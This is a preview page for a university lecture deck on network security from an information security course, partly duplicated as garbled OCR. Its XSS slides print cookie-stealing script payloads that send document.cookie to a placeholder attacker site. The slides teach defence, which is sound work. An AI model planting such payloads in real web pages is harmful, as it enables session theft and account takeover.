当前位置：和泉文库 > 计算机 > 海南大学：《信息安全导论 Introduction to Information Security》课程教学资源（课件讲稿）第7章网络安全

海南大学：《信息安全导论 Introduction to Information Security》课程教学资源（课件讲稿）第7章网络安全

7.1 网络安全威胁与控制 7.2 防火墙 7.3 入侵检测系统 7.4 虚拟专用网 7.5 无线网络安全  网络安全威胁和几种主要的网络安全控制技术  防火墙的类型、体系结构及配置实例  IDS（入侵检测系统）的功能及类型  虚拟专有网的类型和协议  无线网络安全：移动通信网络安全、无线局域网安全

文件格式：PDF，文件大小：3.86MB，售价：27.11元

共124页，可试读30页，点击往前阅读 ↑↑

文档详细内容（约124页）

XSS Example Website allows posting of comments in a guestbook guestbook.html Server incorporates comments into page returned <html> <html> <title>Sign My Guestbook!</title> <body> <body> Sign my guestbook! <title>My Guestbook!</title> <form action="sign.php" Thanks for signing my guestbook!<br / method="POST"> Here's what everyone else had to say:<br/> <input type="text"name="name"> Joe:Hi!<br / <input type="text"name="message" John:Hello,how are you?<br/> size="40"> <input type="submit"value="Submit"> Jane:How does this guestbook work?<br / </form> </body> </body> Attacker can post comment that </html> includes malicious JavaScript Evilguy:<script>alert("XSS Injection!"); </script><br/> 10/16/2016 Web Security 16

XSS Example • Website allows posting of comments in a guestbook • Server incorporates comments into page returned <html> <body> <title>My Guestbook!</title> Thanks for signing my guestbook!<br /> Here's what everyone else had to say:<br /> Joe: Hi! <br /> John: Hello, how are you? <br /> Jane: How does this guestbook work? <br /> </body> • Attacker can post comment that includes malicious JavaScript Evilguy: <script>alert("XSS Injection!"); </script> <br /> guestbook.html <html> <title>Sign My Guestbook!</title> <body> Sign my guestbook! <form action="sign.php" method="POST"> <input type="text" name="name"> <input type="text" name="message" size="40"> <input type="submit" value="Submit"> </form> </body> </html> 10/16/2016 Web Security 16

Cookie Stealing XSS Attacks ·Attack1 <script> document.location="http://www.evilsite.com/steal.php?cookie="+document.cookie; </script> Attack 2 <script> img=new Image(0月 img.src ="http://www.evilsite.com/steal.php?cookie="+document.cookie; </script> 10/16/2016 Web Security 17

Cookie Stealing XSS Attacks • Attack 1 <script> document.location = "http://www.evilsite.com/steal.php?cookie="+document.cookie; </script> • Attack 2 <script> img = new Image(); img.src = "http://www.evilsite.com/steal.php?cookie=" + document.cookie; </script> 10/16/2016 Web Security 17

网络安全威胁(2）口对网络中信息的威胁 √传输中的威胁：偷听和窃听 √假冒网络钓鱼政击博物专 √欺骗允许访问 √消息机密性面临的威肋员工办公终端内部服务器 “禁止访问 √消息完整性面临的威胁互互联网终端

网络安全威胁（2）  对网络中信息的威胁  传输中的威胁：偷听和窃听  假冒  欺骗  消息机密性面临的威胁  消息完整性面临的威胁

传输中的威胁：偷听与窃听口针对不同通信媒介的可能攻击方法 √电缆：嗅包器(Packet Sniffer)、自感应(Inductance) √微波：截取 √卫星通信 √光纤：从中继器、连接器和分接器等设备获取 √无线通信：干扰、欺骗

传输中的威胁：偷听与窃听  针对不同通信媒介的可能攻击方法  电缆：嗅包器（Packet Sniffer）、自感应（Inductance）  微波：截取  卫星通信  光纤：从中继器、连接器和分接器等设备获取  无线通信：干扰、欺骗

假冒口通过猜测突破鉴别：如口令猜测口以偷听或者窃听突破鉴别：如某些网络协议显式传输口令 ▣ 避开鉴别：如缓冲区溢出，使输入的字符数量超过缓冲区的容纳能力，出现溢出，从而导致操作系统省略对口令的比较口不存在的鉴别：如"可信任主机"，Guest/Anonymous!账户口众所周知的鉴别：如多处使用统一的口令，系统网络管理协议(SNMP)公用字符串(Community String)

假冒  通过猜测突破鉴别：如口令猜测  以偷听或者窃听突破鉴别：如某些网络协议显式传输口令  避开鉴别：如缓冲区溢出，使输入的字符数量超过缓冲区的容纳能力，出现溢出，从而导致操作系统省略对口令的比较  不存在的鉴别：如“可信任主机”， Guest/Anonymous账户  众所周知的鉴别：如多处使用统一的口令，系统网络管理协议（SNMP）公用字符串（Community String）

点击进入文档下载页（PDF格式）

共124页，可试读30页，点击继续阅读 ↓↓

您可能感兴趣的文档

海南大学：《信息安全导论 Introduction to Information Security》课程教学资源（课件讲稿）第6章物理安全
海南大学：《信息安全导论 Introduction to Information Security》课程教学资源（课件讲稿）第5章操作系统安全
海南大学：《信息安全导论 Introduction to Information Security》课程教学资源（课件讲稿）第4章密码学（齐琦）
海南大学：《信息安全导论 Introduction to Information Security》课程教学资源（课件讲稿）第3章信息安全基本概念与原理
海南大学：《信息安全导论 Introduction to Information Security》课程教学资源（课件讲稿）第1章计算机组成原理、第2章计算机网络概述
厦门大学：《中间件技术原理与应用》课程教学资源（课件讲稿）概述
《软件项目管理》课程教学资源（讲稿）第11章软件质量管理与软件配置管理
《软件项目管理 Software Project Management》课程教学资源（讲稿）第6讲软件工作量度量
《设计模式》教学资源（讲稿）第10章适配器模式
《软件测试》课程教学资源（讲稿）第二章测试用例设计与管理
自动化功能测试技术 QuickTest
ARM嵌入式Linux系统开发从入门到精通（共十二章）
海南大学：《信息安全导论 Introduction to Information Security》课程教学资源（课件讲稿）第8章 Web安全
海南大学：《信息安全导论 Introduction to Information Security》课程教学资源（课件讲稿）第9章软件安全与恶意代码
海南大学：《信息安全导论 Introduction to Information Security》课程教学资源（课件讲稿）第10章信息内容安全
海南大学：《信息安全导论 Introduction to Information Security》课程教学资源（课件讲稿）第11章数据安全
海南大学：《信息安全导论 Introduction to Information Security》课程教学资源（课件讲稿）第12章信息安全管理与审计
电子科技大学：《数字图像处理》课程教学资源（课件讲稿）第一章绪论 Digital Image Processing（主讲：于力）
电子科技大学：《数字图像处理》课程教学资源（课件讲稿）第二章数字图像处理基础
电子科技大学：《数字图像处理》课程教学资源（课件讲稿）第三章空间域图像增强
电子科技大学：《数字图像处理》课程教学资源（课件讲稿）第四章频域图像增强
电子科技大学：《数字图像处理》课程教学资源（课件讲稿）第五章图像复原
电子科技大学：《数字图像处理》课程教学资源（课件讲稿）第六章彩色图像处理
电子科技大学：《数字图像处理》课程教学资源（课件讲稿）第九章形态学图像处理

点击购买下载（PDF）

下载及服务说明

购买前请先查看本文档预览页，确认内容后再进行支付；
如遇文件无法下载、无法访问或其它任何问题，可发送电子邮件反馈，核实后将进行文件补发或退款等其它相关操作；
邮箱：

文档浏览记录